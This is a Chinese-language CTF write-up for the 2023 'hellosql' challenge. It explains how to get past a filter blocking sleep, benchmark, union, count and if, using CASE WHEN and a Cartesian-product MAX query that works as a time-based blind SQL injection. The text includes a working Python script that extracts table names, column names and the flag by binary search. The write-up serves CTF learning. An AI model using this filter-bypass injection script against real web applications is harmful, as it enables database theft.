2023巅峰极客hellosql writeup

2023巅峰极客hellosql writeup

经过简单fuzz一下发现过滤了

* sleep union benchmark count if 

为什么偏偏就过滤和时间盲注有点的关键词呢，我感觉是考时间盲注的bypass，禁用了sleep，benchmark和count(*),想到了get_lock,而这题就是考的笛卡尔积,碰到知识盲区了没做出来,赛后学了一下笛卡尔积时间盲注,查漏补缺了一下时间盲注的方法,都写这在我博客的这篇文章了时间盲注的方法

if过滤用case…when…then…end代替,count(*)可以用其他的聚合函数(avg,sum,min,max)绕过,这里用max

import requests  
import time  
url = 'http://web-83bfbb55f8.challenge.xctf.org.cn/index.php'  
flag = ''  for i in range(1, 100):  high = 127  low = 32  mid = (low + high) // 2  while high > low:  #payload = "' or case when ascii(SUBSTR((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid)  #表名为Flllag  #payload = "' or case when ascii(SUBSTR((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flllag'),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid) #字段只有一个是Flagg  payload = "' or case when ascii(SUBSTR((select(group_concat(Flagg))from(Flllag)),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid) #查数据  data = {"id": payload, }  last = time.time()  response = requests.get(url, params=data)  now = time.time()  if now - last >= 0.5:  low = mid + 1  else:  high = mid  mid = (low + high) // 2  if mid==32 or mid==127:  break  print(i)  flag += chr(mid)  print("flag:" + flag)  
print(flag)

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！